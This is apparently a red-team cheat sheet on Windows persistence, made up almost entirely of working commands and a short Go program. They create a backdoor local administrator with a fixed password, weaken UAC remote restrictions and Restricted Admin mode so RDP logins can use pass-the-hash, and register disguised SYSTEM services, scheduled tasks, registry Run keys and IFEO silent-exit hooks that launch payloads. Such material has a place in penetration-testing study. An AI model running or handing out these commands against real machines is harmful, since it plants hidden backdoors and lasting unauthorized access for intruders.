Windows

Create new user

net user mylocaladmin p@ssw0rd! /add /expires:never
net localgroup administrators mylocaladmin /add

Create user mylocaladmin with password p@ssw0rd! and add it to administrators group.

UAC — Token Filter

Change registry settings to allow local administrator accounts to perform administrative tasks remotely without restrictions

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

Create service

Make a service, with autostart. Before need prepare special payload, that is a service binary.

sc.exe create "monitexp" binPath= "C:\PathToServiceBinary" type= own start= auto

Then start service

Start-Service -Name "monitexp"

Background jobs

$job = Start-Job { c:/ProgramData/file.exe -args }

Receive output

Receive-Job -Job $job -Keep

Scheduled task

schtasks.exe

Task create:

schtasks /create /tn msupdate /tr "powershell -w h calc.exe" /sc MINUTE /mo 5 /f /ru SYSTEM

Task info

schtasks /query /tn msupdate /v /fo list

Force the task to start:

schtasks /run /tn msupdate /i

Delete task:

schtasks /delete /tn msupdate /f

Provide RDP access

Turn on RDP

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

Bypass Restricted Admin Mode

reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

Connect

xfreerdp /v:172.16.222.254 /u:username /pth:<NT_HASH> /dynamic-resolution +clipboard

Go based binary to create local admin

package main

import (
	"fmt"
	"log"
	"os/exec"
)

func main() {
	addUserCmd := "net user mylocaladmin p@ssw0rd! /add /expires:never"
	addToAdminGroupCmd := "net localgroup administrators mylocaladmin /add"

	err := executeCommand(addUserCmd)
	if err != nil {
		log.Fatal(err)
	}

	err = executeCommand(addToAdminGroupCmd)
	if err != nil {
		log.Fatal(err)
	}

}

func executeCommand(command string) error {
	cmd := exec.Command("cmd", "/C", command)

	output, err := cmd.CombinedOutput()
	if err != nil {
		return fmt.Errorf("err: %s\noutput : %s", err, output)
	}
	return nil
}

Registry

Windows Persistence: Registry Run KeysMedium

What are Run keys?

There are two different types of run keys: Those that get run once and those that get run every time the user logs in.

The following key get run everytime a specific user logs in. You will have to specify the SID of the user:

HKEY_USERS\<sid>\Software\Microsoft\Windows\CurrentVersion\Run\

The following registry key runs every time any user logs into the machine:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\

The run once keys are only executed once. If your malware uses these keys to persist, then it should contain a function to add this key every time it gets executed.

Command Prompt / CMD

With reg add KEY_NAME /V VALUE_NAME /d DATA /f you can add a new key.

KEY_NAME should be the registry key name, e.g. “run once key”.
VALUE_NAME should be the name of the entry.
DATA should be the data of the entry, for example the path to your malicious executable.

Code

Of course you can also implement the creation of a registry key in your code. In C# you can do that with the following code:

Microsoft.Win32.RegistryKey key; 
key = Microsoft.Win32.Registry.CurrentUser.CreateSubKey("My_Key"); key.SetValue("My_Key", "Test"); 
key.Close();

Registry run keys

Persistence – Registry Run KeysPenetration Testing Lab

HKCU

reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v Pentestlab /t REG_SZ /d "C:\Users\pentestlab\pentestlab.exe"
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v Pentestlab /t REG_SZ /d "C:\Users\pentestlab\pentestlab.exe"
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices" /v Pentestlab /t REG_SZ /d "C:\Users\pentestlab\pentestlab.exe"
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" /v Pentestlab /t REG_SZ /d "C:\Users\pentestlab\pentestlab.exe"

HKLM

reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v Pentestlab /t REG_SZ /d "C:\tmp\pentestlab.exe"
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v Pentestlab /t REG_SZ /d "C:\tmp\pentestlab.exe"
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices" /v Pentestlab /t REG_SZ /d "C:\tmp\pentestlab.exe"
reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce" /v Pentestlab /t REG_SZ /d "C:\tmp\pentestlab.exe"

HKCU\Software\Microsoft\Windows\CurrentVersion\Run
HKLM\Software\Microsoft\Windows\CurrentVersion\Run

DIfference: HKCU → for current user only, HKLM → for all

there are two more registry locations that could allow red teams to achieve persistence by executing either an arbitrary payload or a DLL. These will be executed during logon and require admin level privileges.

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001" /v Pentestlab /t REG_SZ /d "C:\tmp\pentestlab.exe"
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend" /v Pentestlab /t REG_SZ /d "C:\tmp\pentestlab.dll"

Image File Execution Options (IFEO)

IFEO – Penetration Testing LabPenetration Testing Lab

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v GlobalFlag /t REG_DWORD /d 512
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v ReportingMode /t REG_DWORD /d 1
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /d "C:\temp\pentestlab.exe"

The hexadecimal value 0x200 in the “GlobalFlag” registry key enables the silent exit monitoring for the notepad process.
The ReportingMode registry key enables the Windows Error Reporting process (WerFault.exe) which will be the parent process of the “MonitorProcess” pentestlab.exe.
When the notepad process is killed (user has closed the notepad application) the payload will be executed and the communication will establish with the command and control.

PreviousPERSIST NextLinux

Last updated 4 days ago

hashtagCreate new user

hashtagUAC — Token Filter

hashtagCreate service

hashtagBackground jobs

hashtagScheduled task

hashtagschtasks.exe

hashtagProvide RDP access

hashtagTurn on RDP

hashtagBypass Restricted Admin Mode

hashtagConnect

hashtagGo based binary to create local admin

hashtagRegistry

hashtagWhat are Run keys?

hashtagCommand Prompt / CMD

hashtagCode

hashtagRegistry run keys

hashtagImage File Execution Options (IFEO)